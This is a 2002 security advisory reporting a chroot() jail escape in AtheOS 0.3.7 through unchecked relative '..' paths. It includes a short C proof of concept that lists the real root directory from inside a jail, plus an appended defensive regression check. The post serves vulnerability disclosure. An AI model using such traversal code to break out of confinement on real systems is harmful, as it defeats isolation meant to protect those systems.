From: Jedi/Sector One (jpureftpd.org)
Date: Thu Feb 07 2002 - 11:52:27 CST

                              -------( AtheOS )-------

      AtheOS is a free desktop operating system under the GPL license. AtheOS
    currently runs on Intel, AMD and other compatible processors and supports
    the Intel Multi Processor architecture.

      AtheOS home page is : http://www.atheos.cx
      
                           -------( Vulnerability )-------
                           
      A chroot() call is implemented in AtheOS, and its behavior is supposed to
    be POSIX conformant. Once chroot(<directory>) is issued by a process,
    <directory> should become the base directory ('/') with no way out of the
    jail. That feature is widely used to protect applications against
    unwanted directory traversals (ftp, http, etc.).

      After a chroot() call on AtheOS, '/' indeed seems to become the base
    directory. '/path/to/file' is translated to '<directory>/path/to/file'.

      Unfortunately, relative paths aren't checked against the current chroot
    jail. Therefore, '../../../../path/to/file' will be translated to a file
    outside the chroot jail.
      
                         -------( Affected versions )-------
                           
      Version 0.3.7 seems to be affected by that bug. I didn't check any prior
    release, but they may be vulnerable as well.

                      -------( Simple proof of concept )-------

      The following code will read the content of the real '/' directory, while
    '/tmp' is supposed to be the base of the chroot jail.

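    #include <stdio.h>
    #include <unistd.h>
    #include <dirent.h>

    int main(void)
    {
        register DIR *d;
        register const struct dirent *e;

        /* Enter the jail at /tmp, move to its root, then open "..".
           On a conformant system ".." is still the jail root here. */
        if (chdir("/") || chroot("/tmp") || chdir("/") ||
            (d = opendir("..")) == NULL) {
            return 1;
        }
        /* On the affected AtheOS release this lists the real '/'. */
        while ((e = readdir(d)) != NULL) {
            puts(e->d_name);
        }
        closedir(d);
        return 0;
    }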

                        -------( Vendor notification )-------

      I reported the problem to the AtheOS maintainer <kurtatheos.cx> on
    January 2nd. The mail bounced (message id: 20020102235031.A20057c9x.org) on
    January 10th.

      I sent back another mail to <webmasteratheos.cx> (message id :
    20020110000235.GA31372c9x.org) . The mail bounced on January 17th.

      I finally sent a mail to the AtheOS-Developer mailing-list. No one ever
    answered.

                              -------( Impact )-------

      Don't trust chroot() on AtheOS. Users can traverse directories.
      

      Best regards,

                 -Frank.

    -- 
     __  /*-      Frank DENIS (Jedi/Sector One) <j42-Networks.Com>     -*\  __
     \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
      \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/
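
The confinement property described in the advisory can be turned into a regression check: at the root of a jail, '..' must resolve to the same file as '.'. The following is an added example, not code from the original post; the function names are made up for illustration, and comparing device and inode numbers is this example's chosen way to decide that two paths name the same directory.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1        /* exposes chroot() in glibc's <unistd.h> */
#endif
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if both paths name the same file (device + inode), 0 if not, -1 on error. */
static int same_file(const char *a, const char *b)
{
    struct stat sa, sb;

    if (stat(a, &sa) != 0 || stat(b, &sb) != 0)
        return -1;
    return sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}

/* At the process root, ".." must resolve to the root itself.
   Returns 1 if it does, 0 if ".." leads somewhere else, -1 on error. */
static int dotdot_is_clamped(void)
{
    if (chdir("/") != 0)
        return -1;
    return same_file(".", "..");
}

/* Enter the jail (requires root) and run the check from inside it.
   chdir() first so the working directory is inside the jail before chroot(). */
static int jail_is_confined(const char *jail)
{
    if (chdir(jail) != 0 || chroot(".") != 0)
        return -1;
    return dotdot_is_clamped();
}

int main(int argc, char **argv)
{
    /* With an argument: test that directory as a jail. Without: test the
       current root, which needs no privileges. */
    int r = (argc > 1) ? jail_is_confined(argv[1]) : dotdot_is_clamped();

    if (r < 0) {
        perror("chroot check");
        return 2;
    }
    puts(r ? "OK: '..' at the root stays inside the root"
           : "FAIL: '..' at the root leaves the jail");
    return r ? 0 : 1;
}
```

Run as root with a jail directory as the argument; exit status 1 means '..' resolved outside the jail, which is the behavior the advisory reports.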